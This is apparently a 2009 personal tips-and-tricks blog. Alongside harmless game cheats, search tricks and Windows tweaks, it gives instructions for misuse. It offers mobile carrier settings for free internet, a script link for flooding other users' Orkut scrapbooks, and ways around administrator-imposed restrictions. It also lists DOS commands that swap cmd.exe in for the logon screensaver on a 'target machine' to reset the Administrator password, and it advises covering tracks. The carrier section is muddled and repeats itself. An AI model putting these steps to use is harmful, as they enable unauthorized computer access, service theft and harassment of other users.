Sunday, April 26, 2009

How to find MP3 with Google


How to find MP3 with Google

Hello all. I hope all of you have a nice and safe surfing there. Did you know you can find a lot of mp3 only by using Google and you don't need to sign up with rapidshare or megaupload or what or any torrent site. Google have everything HAHAHA

This is a little tricks you should do:

1) Go to http://www.google.com (yeah you know that)

2) at search bar type intitle:"index of" songname/artist name . E.g intitle:"index of" metallica

3)You will see a result and majority the subtitle refers more to "index of" search results that's why you can download everything cuz the "index of" contain the ingredients of the web HAHAHAHA

4)Well try experiment yourself with this. you can change from intitle:"index of" metallica to intitle:"index of" (mp3mp4avi) metallica. Maybe your search results get more expanded and more related to your search. YEAH!

Friday, April 24, 2009

vodafone internet hack....
This method has been tested on different mobiles and has been confirmed to be working.
Followng are the Settings you require to configure on your Mobile:

Account Name: Vodafone_gprs
Homepage: http://live.vodafone.in/
User Name: (no need)
Pass: (no need)

Access Point Settings:-
Proxy: Enabled
Proxy Address: 10.10.1.100
Proxy Port: 9401
Data Bearer: Packet Data

Bearer Settings:-
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)

*IF that happen this settings is not working then change the proxy port number to:-

Proxy Port: 9401


All you need to have is
–>PC
–>Serial/USB cable/Bluetooth dongle
–>Any Browser(I suggest Opera as we can browse both wap and other sites)

Follow These Steps:
—>Activate Airtel Live sending a message MASALA ACTIVE to 121
—>Create a profile with the following settings in your data account under Data Communication

GATEWAY : 100.1.200.99
APN : airtelfun.com
USERNAME : blank
PASSWORD : blank
PASS REQ : OFF
ALLOW CALLS : AUTOMATIC
IPADDRESS :
DNSADDRESS :
DATA COMP : OFF
HEADER COMP : OFF

and then Under INTERNET PROFILES,

INTERNET MODE : HTTP or WAP (both works)
USE PROXY : YES
IP ADDRESS : 100.1.200.99
PORT : 8080
USERNAME :
PASSWORD :

–>Create a new dial-up connection on your pc after connecting the mobile to pc,using the NEW CONNECTION WIZARD as follows

ISP Name : Anyname
Phone Number : *99***1#
Username and Password : blank

–>Configure your browser to use the proxy 100.1.200.99 and port 8080.

–>Connect to the dial-up account. You will be connected at 115.2kbps

—>Now if you try to access any site on your mobile you ll get an error message like “Access Denied”

—>Open your browser, and start browsing and voila it opens the regular sites and if u beleive ull get a d/l speed of 5-6 kbps

Common Errors:
If you are getting any error wile dialing a dial up connection than go to
Control panel>> Phone and modem>>>select modem and click on its properties >>advanced
and enter the following initialization commands
CODE
AT+CGDCONT=2, “IP”,”airtelfun.com”,”",0,0

Now it should be connected without any error......!

Thursday, April 09, 2009

Age of empires II cheats



Age of Empires 2 Cheats
Entry Location: Press Enter to enter cheats Type the code, for example cheese steak jimmy's. Don't press Enter, though: copy it then press Enter. Press Enter then paste it the keep doing it then about 1 minute you will have 1000000 food. You can do it with other things like wood, stones, gold, etc.
Entry Location: Bring up the chat box by pressing ENTER then enter these codes pepperoni pizza (gives you 1000 food) coinage (gives you 1000 gold) woodstock (gives you 1000 wood) quarry (gives you 1000 stone) reveal map (reveales map but not fog) no fog (lifts fog) gaia (control animals not people)
Entry Location: During gameplay Ctrl + Q
To increase your transport ship capacity without researching any thing. Go into the siege weapons work shop and create a few battering rams. Then garrison some troops inside the battering rams (these have to be foot soldiers other wise it won't work). Then load them on to a transport ship and you'll be able to quadruple your transport ship capacit
Entry Location: During gameplay Ctrl + C
Entry Location: During gameplay Ctrl + P
Entry Location: While playing, hit ENTER, then type in the code. HOW DO YOU TURN THIS ON
Entry Location: While playing, hit ENTER, then type in the code. TORPEDO#
Entry Location: While playing, hit ENTER, then type in the code. TO SMITHEREENS
Entry Location: While playing, hit ENTER, then type in the code. I R WINNER
Entry Location: Use the following command line parameter to start the game 1024
Entry Location: Use the following command line parameter to start the game autompsave
Entry Location: Use the following command line parameter to start the game Msync
Entry Location: During gameplay Ctrl + T
Entry Location: Use the following command line parameter to start the game NoTerrainSound
Entry Location: Use the following command line parameter to start the game NoStartup
Entry Location: Use the following command line parameter to start the game NoSound
Entry Location: Use the following command line parameter to start the game NormalMouse
Entry Location: Use the following command line parameter to start the game NoMusic
Entry Location: Use the following command line parameter to start the game Mfill
Entry Location: Use the following command line parameter to start the game 1280
Entry Location: Use the following command line parameter to start the game 800
Entry Location: While playing, hit ENTER, then type in the code. BLACK DEATH
Entry Location: While playing, hit ENTER, then type in the code. ROCK ON
Entry Location: While playing, hit ENTER, then type in the code. LUMBERJACK
Entry Location: While playing, hit ENTER, then type in the code. ROBIN HOOD
Entry Location: While playing, hit ENTER, then type in the code. CHEESE STEAK JIMMY'S
Entry Location: While playing, hit ENTER, then type in the code. MARCO
Entry Location: While playing, hit ENTER, then type in the code. POLO
Entry Location: While playing, hit ENTER, then type in the code. AEGIS
Entry Location: While playing, hit ENTER, then type in the code. NATURAL WONDERS
Entry Location: While playing, hit ENTER, then type in the code. RESIGN
Entry Location: While playing, hit ENTER, then type in the code. WIMPYWIMPYWIMPY
Entry Location: While playing, hit ENTER, then type in the code. I LOVE THE MONKEY HEAD

Wednesday, April 08, 2009

ORKUT MANIA


Writing a star in your orkut scrap - Write & # 9 7 3 3 before your scrap without spaces in between these characters. And see a cool star icon that comes up in thescrap on submitting.

2. Writing scraps in reverse- Add & # 8 2 3 8 before yourscrap without spaces in between these characters. The whole text will get reversed on submitting it. Isn’t It Cool.

3. Make yourself invisible on orkut - In MS Paint, create a smallest image possible and then upload it in internet explorer. It will be unclickable and you are invisible now. Voilla ..!!

4. Adding cool symbols in orkut scrap -

alt + 987 - █, alt + 1 - ☺, alt + 2 - ☻, alt + 3 - ♥,

alt + 4 - ♦, alt + 5 - ♣, alt + 6 - ♠, alt + 7 - •,

alt + 8 - ◘, alt + 9 - ○, alt + 0178 - ², alt + 0489 - é,

alt + 0756 - ô, alt + 0742 - æ, alt + 0719 - Ï,

alt + 0739 - ã, alt + 0729 - Ù

Keep trying different key combinations for more cool symbols.

Orkut Tips and tricks



Send multiple scraps and do some social service for sake of those who are in desperate need of some scraps

What you need :
  1. Firefox 1.5+
  2. Greasemonkey plugin for firefox

Install both the above mentioned softwares, restart your firefox after installation of the reasemonkey plugin.

http://www.tricks4fun.com/orkut/scrapflooder.user.js

Now right click the above given link, click “install this script” from the so opened menu. The script should get installed if you have installed firefox and greasemonkey correctly.

Now open someone’s scrapbook & just see what happens.

How to edit the script?

  • Keeping firefox window open, open the Tools menu from the firefox’s toolbar, and click “Manage User Scripts”.
  • Select Scrap Flooder
  • Click Edit
  • Open it with notepad from c:\windows\notepad.exe only if asks for some editor.
  • Search for this line in the script “document.getElementById(’scrapText’).value=’[b]I m the KING..!![/b][silver]’+'’+i+’[/silver]’;”
  • Write something else in place of I m the KING..!!
  • Save
  • Again test this script on someone’s scrabook

~nJoy wisely~

Tuesday, April 07, 2009

Shortcut keys for programs

Start a program using a keyboard shortcut
The Start menu is great for finding programs, but its multiple levels of folders can be time consuming to navigate. If there is a program you start frequently, you should set a keyboard shortcut for it so that you can start the program without taking your hands off the keyboard.
To set a keyboard shortcut to start a program
1.
Click the Start menu, and then click All Programs. Right-click the program that you want to start with a keyboard shortcut, and then click Properties.
2.
Click in the Shortcut key box. Now press the letter on your keyboard that you want to use to start the program. Make it easy to remember—for example, press I for Microsoft Internet Explorer.
Note: You can use either uppercase or lowercase letters when creating your keyboard shortcuts—and when accessing them later. In the Shortcut key box, Microsoft Windows XP automatically adds Ctrl + Alt + before the key you pressed. When you want to start the program, hold down both the CTRL and ALT keys simultaneously, while also pressing the letter you chose. This way, your program won't start every time you type that letter.
3.
Click OK.
4.
Now test your shortcut. Hold down the CTRL and ALT keys, and then press the letter you chose. If you find it difficult to hold down two keys at once, read Turn on the Sticky Keys feature. Your program should start.
When your friends see you start up programs without touching your mouse, they just might think you have a psychic connection with your computer!

Monday, April 06, 2009


If you log into a limited account on your target machine and open up a dos prompt

then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the 
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called ABHISHEK and you want the password ADMANIA enter this

"net user ABHISHEK ADMANIA"

and this changes the password on franks machine to blah and your in.


Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

TIPS for YOU


DISABLE TOOL TIPS:

Every time the user places the mouse pointer over a particular icon on the desktop, a tool tip pops up. This tool tip displays information about the icon.

tool and tips..for tool options.....

If you feel you no longer require tool tips, you can use this simple registry tweak to disable it. To do so:

  1. Click Start and type in regedit in the Search box.
  2. Browse to theHKEY_CURRENT_USER/SOFTWARE/MICROSOFT/WINDOWS/CURRENTVERSION/EXPLORER/ADVANCED, rregistry key.
  3. On the right pane, click the Showinfo tip regsitry key.
  4. Click Edit Modify.
  5. Change the value to 0 in the Value data field.
  6. close the registry editor window and reboot your system for the changes to take effect.

DISABLE AUTOPLAY:

WHEN you connect a plug n play device on your system, Windows Vista automatically detects it and the autoplay feature executes.

You can disable this feature if not required. To do do:-

  1. clcik start control panel
  2. under the hardware and sounds option clcik play cds or other media automatically
  3. in the resulting windows, clear the use autoplay for all media and devices check box
  4. once done clcik OK.

Sunday, April 05, 2009

TIPS N TRICKS



Hidden Programs In Windows XP !
Is it strange to hear , but true that some good programs are hidden in Windows XP !!!Programs :1. Private Character Editor :Used for editing fonts,etc.** start>>Run** Now, type eudcedit2. Dr. Watson :This an inbuilt windows repairing software !** start>>Run** Now, type drwtsn323. Media Player 5.1 :Even if you upgrade your Media Player, you can still access your old player in case the new one fails !!!** start>>Run** Now, type mplay324. iExpress :Used to create SetupsYou can create your own installers !** start>>Run** Now, type iexpress



Error Reporting in XP
If error reporting in XP is bugging you then turn it off.When a system error occurs in XP, a little dialog box appears asking if you want to report the error to Microsoft. Click the message box to make it disappear. You don't have to report the error if you don't want to and on today's "Call for Help" Leo shows you how to turn off the feature if you find it distracting.To disable error reporting, follow these directions:
1. Right-click My Computer and choose Properties.2. Click the Advanced tab on your System Properties dialog box.3. Click the Error Reporting button on the Advanced tab.4. Place a checkmark next to "Disable error reporting."5. Leave the other radio button unchecked next to the text labeled, "But notify me when critical errors occur."6. Click OK.

"Hacking Secrets Ocean"

A few "Hacking Secrets Ocean"

Almost all system administrators make certain changes and make the system restricted. System Administrators can hide the RUN option, the FIND command, the entire Control Panel, drives in My Computer like D: A: etc. They can even restrict activities of a hacker my disabling or hiding, even the tiniest options or tools.

Most commonly these restrictions are imposed locally and are controlled by the Windows Registry. But sometimes the smart system administrators control the activities of the hacker by imposing restrictions remotely through the main server.

Poledit or Policy Editor is a small kewl tool which is being commonly used by system administrators to alter the settings of a system. This utility is not installed by default by Windows. You need to install in manually from the Windows 98 Installation Kit from the Resource Kit folder. user.dat file that we saw earlier.

The Policy Editor tool imposes restrictions on the user's system by editing the user.dat file which in turn means that it edits the Windows Registry to change the settings. It can be used to control or restrict access to each and every folder and option you could ever think of. It has the power to even restrict access to individual folders, files, the Control Panel, MS DOS, the drives available etc. Sometimes this software does make life really hard for a Hacker. So how can we remove the restrictions imposed by the Policy Editor? Well read ahead to learn more.

You see the Policy Editor is not the only way to restrict a user's activities. As we already know that the Policy Editor edits the Windows Registry(user.dat) file to impose such restrictions. So this in turn would mean that we can directly make changes to the Windows Registry using a .reg file or directly to remove or add restrictions.

Launch Regedit and go to the following Registry Key:

HKEY_CURRENT_USER/Software/Microsoft/CurrentVersion/Policies

Under this key, there will definitely be a key named explorer. Now under this explorer key we can create new DWORD values and modify it's value to 1 in order to impose the restriction. If you want to remove the Restriction, then you can simply delete the respective DWORD values or instead change their values to 0. The following is a list of DWORD values that can be created under the Explorer Key-:

NoDeletePrinter: Disables Deletion of already installed Printers

NoAddPrinter: Disables Addition of new Printers

NoRun : Disables or hides the Run Command

NoSetFolders: Removes Folders from the Settings option on Start Menu (Control Panel, Printers, Taskbar)

NoSetTaskbar: Removes Taskbar system folder from the Settings option on Start Menu

NoFind: Removes the Find Tool (Start >Find)

NoDrives: Hides and does not display any Drives in My Computer

NoNetHood: Hides or removes the Network Neighborhood icon from the desktop

NoDesktop: Hides all items including, file, folders and system folders from the Desktop

NoClose: Disables Shutdown and prevents the user from normally shutting down Windows.

NoSaveSettings: Means to say, 'Don't save settings on exit'

DisableRegistryTools: Disable Registry Editing Tools (If you disable this option, the Windows Registry Editor(regedit.exe) too

will not work.)

NoRecentDocsHistory: Removes Recent Document system folder from the Start Menu (IE 4 and above)

ClearRecentDocsOnExit: Clears the Recent Documents system folder on Exit.

Nolnternetlcon: Removes the Internet (system folder) icon from the Desktop

Under the same key: HKEY_CURRENT_USER/Software/Microsoft/CurrentVersion/Policies you can create new subkeys other than the already existing Explorer key. Now create a new key and name it System. Under this new key, system we can create the following new DWORD values(1 for enabling the particular option and 0 for disabling the particular option):

NODispCPL: Hides Control Panel

NoDispBackgroundPage: Hides Background page.

NoDispScrsavPage: Hides Screen Saver Page

NoDispAppearancePage: Hides Appearance Page

NoDispSettingsPage: Hides Settings Page

NoSecCPL: Disables Password Control Panel

NoPwdPage: Hides Password Change Page

NoAdminPaqe: Hides Remote Administration Page

NoProfilePage: Hides User Profiles Page

NoDevMgrPage: Hides Device Manager Page

NoConfigPage: Hides Hardware Profiles Page

NoFileSysPage: Hides File System Button

NoVirtMemPage: Hides Virtual Memory Button

Similarly, if we create a new subkey named Network, we can add the following DWORD values under it(1 for enabling the particular option and 0 for disabling the particular option):

NoNetSetupSecurityPage: Hides Network Security Page

NoNelSetup: Hides or disables the Network option in the Control Panel

NoNetSetupIDPage: Hides the Identification Page

NoNetSetupSecurityPage: Hides the Access Control Page

NoFileSharingControl: Disables File Sharing Controls

NoPrintSharing: Disables Print Sharing Controls

Similarly, if we create a new subkey named WinOldApp, we can add the following DWORD values under it(1 for enabling the particular option and 0 for disabling the particular option):

Disabled: Disable MS-DOS Prompt

NoRealMode: Disable Single-Mode MS-DOS.

So you see if you have access to the Windows Registry, then you can easily create new DWORD values and set heir value to 1 for enabling the particular option and 0 for disabling the particular option. But Sometimes, access to the Windows Registry is blocked. So what do you do? Go to the Windows Directory and delete either user.dat or system.dat (These 2 files constitute the Windows Registry.) and reboot. As soon as Windows logs in, it will display a Warning Message informing you about an error in the Windows Registry. Simply ignore this Warning Message and Press CTRL+DEL+ALT to get out of this warning message.(Do not press OK) You will find that all restrictions have been removed.

The most kind of restriction found quite commonly is the Specific Folder Restriction, in which users are not allowed access to specific folders, the most common being the Windows folder, or sometimes even access to My Computer is blocked. In effect, you simply cannot seem to access the important kewl files which are needed by you to do remove restrictions. What do you? Well use the RUN command. (START >RUN). But unfortunately a system administrator who is intelligent enough to block access to specific folder, would definitely have blocked access to the RUN command. Again we are stuck.

Windows is supposed to be the most User Friendly Operating System on earth. (At least Microsoft Says so.)

It gives the User an option to do the same thing in various ways. You see the RUN command is only the most convenient option of launching applications, but not the only way. In Windows you can create shortcuts to almost anything from a file, folder to a Web URL. So say your system administrator has blocked access to the c:windowssystem folder and you need to access it. What do you do? Simply create a Shortcut to it. To do this right click anywhere on the desktop and select New > Shortcut. A new window titled Create Shortcut pops up. Type in the path of the restricted folder you wish to access, in this case c:windowssystem. Click Next, Enter the friendly name of the Shortcut and then click Finish. Now you can access the restricted folder by simply double clicking on the shortcut icon. Well that shows how protected and secure *ahem Windows *ahem is.

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HACKING TRUTH: Sometimes when you try to delete a file or a folder, Windows displays an error message saying that the file is protected. This simply means that the file is write protected, or in other words the R option is +. Get it? Anyway, you can stop Windows from displaying this error message and straightaway delete this file by changing its attributes to Non Read Only. This can be done by Right Clicking on the file, selecting Properties and then

unselecting the Read Only Option.

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There is yet another way of accessing restricted folders. Use see, DOS has a lovely command known as START. Its general syntax is:

START application_path

It does do what it seems to do, start applications. So in you have access to DOS then you can type in the START command to get access to the restricted folder. Now mostly access to DOS too would be blocked. So again you can use the shortcut trick to launch, c:command.com or c:windowscommand.com. (Command.com is the file which launches MS DOS).

Accessing Restricted Drives.

The problem with most system administrators is that they think that the users or Hackers too are stupid. Almost all system administrators use the Registry Trick (Explained Earlier) to hide all drives in My Computer. So in order to unhide or display all drives, simply delete that particular key.(Refer to beginning of Untold Secrets Section.)

Some systems have the floppy disk disabled through the BIOS. On those systems if the BIOS is protected, you may need to crack the BIOS password. (For that Refer to the Windows Hacking Chapter). Sometimes making drives readable (Removing R +) and then creating Shortcuts to them also helps us to get access to them.

Further Changing your Operating System's Looks by editing .htt files

If you have installed Windows Desktop Update and have the view as Web Page option enabled, you can customise the way the folder looks by selecting View > Customise this folder. Here you can change the background and other things about that particular folder. Well that is pretty lame, right? We hackers already know things as lame as that. Read on for some kewl stuff.

Well, you could also change the default that is stored in a Hidden HTML Template file (I think so..) which is nothing but a HTML document with a .htt extension. This .htt file is found at: %systemroot%webfolder.htt.

The %systemroot% stands for the drive in which Windows is Installed, which is normally C:

You can edit these .htt files almost just like you edit normal .HTM or .HTML files. Simply open them in an ASCII editor like Notepad. The following is a list of .htt files on your system which control various folders and which can be edited to customise the way various folders look.

controlp.htt Control Panel

printers.htt Printers

mycomp.htt My Computer

safemode.htt Safe Mode

All these files are found in the web folder in %systemfolder%. The folder.htt file has a line:

'Here's a good place to add a few lines of your own"

Posted by TEJASWI at 3:52 PM 1 comments



Customizing The Shortcut Arrow

All shortcuts have a tiny black arrow attached to it's icon to distinguish from normal files. This arrow can sometimes be pretty annoying and as a Hacker should know how to change each and everything, here goes another trick. Launch the Registry Editor and go to:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionexplorerShell Icons.

Now, on the right pane is a list of icons ( we found out that on some systems, Windows 98 especially, the right pane is blank. Don't worry, just add the value as required ). Find the value 29. If it isn't there, just add it. The value of this string should be C:Windowssystemshell32.dll, 29 ( which means the 30th icon in shell32.dll - the first one begins with 0 ). Now, we need blank icon to do this. Just create one with white as the whole icon. Go here to learn how to create an icon. Once done just change the value to C:xxx.ico, 0 where "xxx" is the full path of the icon file and "0" is the icon in it.

Now for some fun. If the blank icon is a bit boring, change it again. You will find that under shell32.dll there is a gear icon, a shared folder ( the hand ) and much more. Experiment for yourself!

Posted by TEJASWI at 3:51 PM 0 comments



Securing NT

By default, NT 4.0 displays the last person who logged onto the system. This can be considered to be a security threat, especially in the case of those who choose their password to be same as their Username. To disable this bug which actually is a feature, go to the following key in the registry editor:

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsNTCurrentVersionWinlogon

Click and select the ReportBookOK item and create a new string value called DontDisplayLastUserName. Modify it and set it's value to 1.

As a system administrator, you can ensure that the passwords chosen by the users are not too lame or too easy to guess. NT has this lovely utility called the User Manager which allows the administrator to set the age limit of the password which forces the users to change the password after a certain number of days. You can also set the minimum length of passwords and prevent users to use passwords which already have been used earlier and also enable account lockouts which will deactivate an account after a specified number of failed login attempts.
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When you log on to Win NT, you should disable Password Caching, this ensures Single NT Domain login and also prevents secondary Windows Logon screen.

Simply copy the following lines to a plain text ASCII editor like: Notepad and save it with an extension, .reg

----------------DISABLE.reg-----------------

REGEDIT4

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesNetwork]

"DisablePwdCaching"=dword:00000001

----------------DISABLE.reg-----------------

To Enable Password Caching use the following .reg file:

--------------Enable.reg-----------------

REGEDIT4

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesNetwork]

"DisablePwdCaching"=dword:00000000

--------------Enable.reg-----------------